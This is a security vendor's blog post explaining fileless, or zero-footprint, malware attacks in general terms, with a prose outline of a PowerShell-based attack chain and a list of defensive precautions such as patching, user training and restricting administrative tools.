Fileless Malware Attacks and How To Protect Yourself - Cerium Networks

Fileless Malware

Share on facebook
Share on twitter
Share on linkedin
Share on email

Protecting Your System from Zero-Footprint Cyber-Attacks

Cybercriminals are continually on the lookout for ways to attack your system without being detected. An increasingly common tactic is the zero-footprint attack, also known as a fileless, or macro attack. This type of attack does not install software on a computer, so many antivirus tools are likely to miss it. Reports indicate that zero-footprint attacks are ten-times more likely to succeed than file-based attacks and they estimate that over 75% of successful compromising cyberattacks in 2017 were fileless.

Zero-footprint attacks evade whitelisting by taking advantage of applications that are already installed on the system and are on the approved whitelist. These attacks typically rely on a user to click a suspicious link or open a malicious file; however, they don’t need to install detectable files on a computer’s hard drive to compromise the system. Instead, they run malicious code or launch scripts that infect endpoints directly from memory, without leaving easily-discoverable artifacts behind.

 

Anatomy of a Zero-Footprint Attack

Here’s an example of how a zero-footprint attack works:

  1. A user clicks a link to a malicious website.
  2. The website loads Flash.
  3. Flash is used to open the Windows PowerShell utility.
  4. PowerShell downloads a script from a server and executes the script through the command line while operating in memory.
  5. The PowerShell script locates the user’s critical data and sends it to the attacker.

 

Detecting Zero-Footprint Attacks

Fortunately, the zero-footprint moniker is a misnomer. There are ways to detect malware even if it isn’t installed on your file system. Some antivirus software can spot the malicious attachment or link, even when there is no executable file installed. However, zero-footprint malware is hidden in RAM, and many antivirus programs only analyze the digital signatures of files stored on a hard drive to identify malicious files; they do NOT inspect memory directly, so fileless attacks often go undetected for a longer period of time.

 

Combatting Zero-Footprint Attacks

Here are some basic precautions you can follow to help secure your system and prevent zero-footprint attacks:

  • Apply all the latest security updates and patches to your operating system, and ensure that all software applications are patched and updated to their latest version
  • Educate your users on the dangers of downloading email attachments or clicking on suspicious links
  • Restrict access to administrative tools like WMI, PowerShell, and Apple Script, that cybercriminals can leverage for attacks
  • Restrict the number of domain administrators who have full access to domain settings
  • Harden your firewalls, endpoint protection, email security, and web blockers
  • Employ behavioral-based network security that enforces rules based on user’s actions and does not rely on signature-based malware detection.

 

No system for combatting zero-footprint attacks is foolproof; however, vigilance and robust threat prevention tools, can slow down or derail cyberattackers and increase the probability they will make mistakes that expose their presence or reveal their attack vector.

Recent Posts

Evaluating the ROI of SD-WAN

In several recent posts, we’ve described many of the potential business benefits of SD-WAN, including better cloud connectivity, improved administration, increased network visibility and reduced

Read More »
For Emergency Support call: (877) 423-7486
For other support requests or to access your Cerium 1463° portal click here
Stay in the Know

Stay in the Know

Don't miss out on critical security advisories, industry news, and technology insights from our experts. Sign up today!

You have Successfully Subscribed!